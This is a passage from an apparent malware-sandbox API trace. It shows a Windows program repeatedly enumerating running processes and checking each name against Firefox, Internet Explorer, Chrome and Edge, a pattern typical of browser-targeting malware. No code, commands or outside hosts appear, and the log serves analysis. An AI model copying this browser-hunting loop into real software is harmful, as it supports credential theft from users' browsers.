lpString2="iexplore.exe") returned 1 [0208.019] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0208.019] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.019] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0208.020] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0208.020] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0208.020] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0208.020] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.020] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0208.020] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0208.020] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0208.020] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0208.021] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.021] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0208.021] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0208.021] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0208.021] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0208.021] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.021] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0208.022] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0208.022] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0208.022] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0208.022] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.022] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0208.022] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0208.022] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0208.022] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0208.022] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.022] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0208.023] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0208.023] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0208.023] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0208.023] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.023] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0208.023] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0208.023] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0208.023] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0208.023] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.023] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0208.024] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0208.024] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0208.024] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0208.024] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0208.024] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0208.024] CloseHandle (hObject=0xd4) returned 1 [0208.025] Sleep (dwMilliseconds=0x3e8) [0209.075] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0209.077] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0209.077] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0209.078] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0209.078] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0209.078] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0209.078] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0209.078] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0209.078] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0209.078] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0209.078] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0209.078] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0209.079] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0209.079] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0209.079] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0209.079] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.079] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0209.079] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0209.079] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0209.079] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0209.079] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0209.079] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0209.080] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0209.080] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0209.080] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0209.080] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.080] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0209.081] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0209.081] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0209.081] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0209.081] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0209.081] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0209.081] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0209.081] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0209.081] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0209.081] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.081] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0209.082] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0209.082] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0209.082] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0209.082] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.082] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0209.082] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0209.082] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0209.082] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0209.082] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0209.082] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0209.083] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0209.083] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0209.083] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0209.083] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0209.083] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.083] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0209.083] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0209.083] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0209.083] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.084] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.084] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0209.084] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0209.084] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0209.084] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.084] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.085] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0209.085] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0209.085] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0209.085] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.085] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.085] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0209.085] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0209.085] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0209.085] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.085] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.086] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0209.086] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0209.086] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0209.086] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.086] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0209.086] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0209.086] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0209.086] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0209.086] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0209.086] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.087] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0209.087] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0209.087] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0209.087] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.087] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.087] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0209.087] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0209.087] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0209.087] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.087] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0209.088] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0209.088] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0209.088] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0209.088] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0209.088] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0209.089] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0209.089] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0209.089] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0209.089] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.089] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0209.089] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0209.089] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0209.089] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0209.089] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.089] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.090] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0209.090] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0209.090] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0209.090] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.090] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0209.090] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0209.090] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0209.090] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0209.090] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.090] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0209.091] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0209.091] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0209.091] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0209.091] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0209.091] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0209.091] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0209.091] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0209.091] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0209.091] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0209.091] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0209.092] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0209.092] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0209.092] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0209.092] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.092] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0209.092] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0209.092] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0209.093] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0209.093] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0209.093] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0209.093] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0209.093] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0209.093] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0209.093] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0209.093] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0209.094] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0209.094] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0209.094] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0209.094] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.094] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0209.094] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0209.094] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0209.094] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0209.094] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.094] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0209.095] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0209.095] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0209.095] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0209.095] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.095] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0209.095] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0209.095] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0209.095] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 